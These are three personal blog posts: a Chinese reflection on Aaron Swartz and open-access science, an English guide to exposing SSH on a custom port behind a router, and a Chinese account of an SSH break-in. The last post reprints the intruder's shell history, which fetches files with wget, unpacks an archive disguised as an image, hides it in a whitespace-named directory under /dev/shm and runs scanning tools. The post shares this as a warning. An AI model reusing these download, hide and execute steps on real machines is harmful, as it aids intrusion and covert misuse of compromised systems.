Categories
Astronomy Feeling

雨滴在思考,上帝在发笑。

    大街上行人匆匆,色彩缤纷艳丽的衣裙随风散成了夏初的花瓣,将一切模糊成为一种暧昧的味道。巴黎第2区的街道上人们行色匆匆,可以看到一对对牵着手的男男女女们,散发出无比幸福甜蜜的荷尔蒙,整幅画面美丽的刺眼。雨一阵一阵的,伞总显得多余,却必不可少。我就这样,坐在窗边,看着路上的行人,痴痴发呆。少有的宁静,内心嘈杂之间的片刻。

    昨夜看了一部关于Aaron Swartz的纪录片,心理乱糟糟的。脑子里不停地浮现Mark说的“connect the world”,以及Aaron说的“public domain”。有时候,我们随心所欲的使用着互联网,理所应当的认为它应该是怎样的体现着自由和共享,然而我们并未意识到,这种自由实际上也是由一些人付出了生命的代价捍卫而来的。仔细想想,科学家的论文被出版者拿来当商品买卖这一点本来就很令人惊讶。科学家的经费出自政府/个人机构的基金资助,而政府的钱又来源于税收,那么最终(受资助的)科学家研究的成果都是要让每个民众同等的享受到的(理想的情况下)。然而,在科学家往期刊投稿需要交版面费的前提下,这些期刊仍旧向读者收取高额的阅读费用,这无疑是在阻碍科学更广泛的传播。知识的权利似乎被集权在少数的几个大的出版机构手里,他们凭借着对阻断知识的自由传播而赚取利润。

    很庆幸我们有arXiv这样的网站存在,使得科学家们可以更广泛的传播自己的科研成果,进行学术交流。而ApJ也将一年之前的文章全部公开。同时,我认为公开文章也是大趋势所在。作为人类共有的知识财富,阻碍其流通,且在其中赚取利润显得越发的不合理。虽然,期刊确实需要支持运营费以及组织审稿人,编辑等费用,但每个投稿人也在支付着高额的版面费。尤其是Nature集团的子刊们,漫天要价。

    忙完了ALMA的观测申请,却越来越觉得自己真的是欠的太多了。到现在才开始用git对文档进行版本控制。以及,自己对于概率统计的知识还远远不够。这怎么能够是一个做天文观测的人能够妥协的现状呢?

    虽然常常在思考生与死:很显然,生命很脆弱,生命很有限。我惧怕死亡,惧怕一切的湮灭,仿佛从来没有存在过一样。但又究竟该怎样的度过这么有限而又脆弱的一生呢?是被生活的琐碎所填充?亦或是自我麻醉,在二次元中寻找幻想里的慰藉?还是整天活在别人眼中,极力优化自己的外表,在社交网络上光鲜亮丽内心却无比空虚?亦或是忙碌的工作,不让自己去惧怕生命虚无的本质?

    有时候,一个本来没有意义的事情,思考太多无益于领悟事情本身。

    夜深了,我又该从梦境中醒来了。

Categories
Astronomy Linux Note

Forwarding port behide a router

Yesterday I was trying to configure my computer behind a router to enable it for the SSH connection from outside the router. After some google-ing, I found many ways all involving changing the iptables rules, but all turned out to be failures. Finally, under the help of Daizhong, I found the working way to configure my computer in order to solve the problem.

Before beginning all the operation below, you need to setup the router to fix your IP address and set the forwarding port through the ADMIN page (normally is 192.168.1.1) of your router(two steps, first is fixing your IP address and then set the port forwarding).

The following steps are:
Firstly, you need to edit the SSHD configuration file

vi /etc/ssh/sshd_config

to enable the port forwarding you set on the ADMIN page of your router.
Then, you need to edit file

vi /etc/services

to set the value of ssh port to the number you gave before.
After that, you should set the firewall either using terminal or UI tools to allow the port for ssh. The terminal way is by adding the following line into the file /etc/sys config/iptables:

-A RH-Firewall-1-INPUT -m state --state NEW -m tcp -p tcp --dport XXXX -j ACCEPT

put your port number to the position of “XXXX”.
In the end, you should set the port allowed under SELinux using:

 sudo semanage port -a -t ssh_port_t -p tcp XXXX

In the end, you can restart the sshd and iptables for a test, by using:

service sshd restart
service iptables restart
ssh username@ip -p XXXX

.

Note all the commands above need superuser account.

Categories
computer Internet Linux

亲身经历了一次Hack攻击

刚才突然发现网络出现异常(出现一些异常的流量),遂调用who命令突然发现iraf用户被人通过ssh登录……都怪我一时疏忽大意,居然给iraf 设置了一个那么简单的密码,而且还开了ssh。结果突然就发现了一个95.77.21.239的IP登录了。我一下子意识到,自己是被黑客攻击了。接着我查了ip归属地,居然是罗马尼亚……肯定只是个幌子。根据和某个高手朋友的结果,鉴定出好在这个黑客不是个高手……如果是的话,我的电脑早就要重装了。然后我查看了一下shell的history发现了如下的操作历史

wget
cd /tmp
chmod +x *
./bash
uname -a
 
wget
tar
cat /etc/issue
cd /dev/shm
mkdir "  "
cd "  "
wget ***; tar zxvf fb.jpg ; rm -rf fb.jpg ; cd fb ; chmod 777 * ; (为了安全起见,我没有贴出链接)
./0-100 196
./100-200 196
cd /dev/shm
w
cd "  "
ls -a
cd fb
ls -a
cat log*
./100-200 196
ls -a
cat log*
./0-100 213
cd fb
cd /dev/shm
ls
cat /proc/cpuinfo
cd /dev/shm
./0-100 213
cd fb

之后我的iraf用户就出现了无数个ftp_scanner命令……幸好我及时发现……然后把他干的好事逆操作一遍……接着杀掉了所有iraf的进程,删除了iraf用户……目前可能没问题了,前提是如果他的操作只停留在shell层面。在这里提醒大家一定要注意linux用户的密码管理,不能疏忽大意。我的个人案例供警示。